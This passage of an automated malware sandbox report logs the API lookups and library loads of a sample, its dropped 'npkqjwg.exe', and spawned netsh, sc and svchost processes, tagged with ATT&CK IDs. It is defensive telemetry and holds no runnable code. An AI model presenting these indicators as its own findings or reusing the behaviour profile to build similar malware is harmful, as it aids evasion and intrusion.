00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00001776)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005100)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00005100)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005656)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00005656)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter _alldiv (UID: 00000000-00005656)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersInfo (UID: 00000000-00005656)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetIfEntry (UID: 00000000-00005656)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetBestInterface (UID: 00000000-00005656)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00005656)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005656)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005656)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00005656)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00005656)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004968)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005132)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005132)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005132)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005132)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005132)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005132)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00001776)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005100)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005100)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005656)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00005656)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00005656)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005656)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005656)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005656)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03ee46b@ADVAPI32.dll\"\n \"0e000f00703fe46b@ADVAPI32.dll\"\n \"0e000f00cc3fe46b@ADVAPI32.dll\"\n \"11001200b447e46b@ADVAPI32.dll\"\n \"110012004848e46b@ADVAPI32.dll\"\n \"120013008c48e46b@ADVAPI32.dll\"\n \"12001300e448e46b@ADVAPI32.dll\"\n \"14001500906ee46b@ADVAPI32.dll\"\n \"14001500a86ee46b@ADVAPI32.dll\"\n \"14001500c06ee46b@ADVAPI32.dll\"\n \"17001800d86ee46b@ADVAPI32.dll\"\n \"0d000e00f06ee46b@ADVAPI32.dll\"\n \"11001200006fe46b@ADVAPI32.dll\"\n \"11001200146fe46b@ADVAPI32.dll\"\n \"0f0010005470e46b@ADVAPI32.dll\"\n \"140015009470e46b@ADVAPI32.dll\"\n \"14001500ac70e46b@ADVAPI32.dll\"\n \"0c000d00f470e46b@ADVAPI32.dll\"\n \"0c000d000471e46b@ADVAPI32.dll\"\n \"0e000f001471e46b@ADVAPI32.dll\"\n \"0e000f002471e46b@ADVAPI32.dll\"\n \"0b000c003471e46b@ADVAPI32.dll\"\n \"180019006c73e46b@RPCRT4.dll\"\n \"130014009873e46b@RPCRT4.dll\"\n \"14001500ac73e46b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 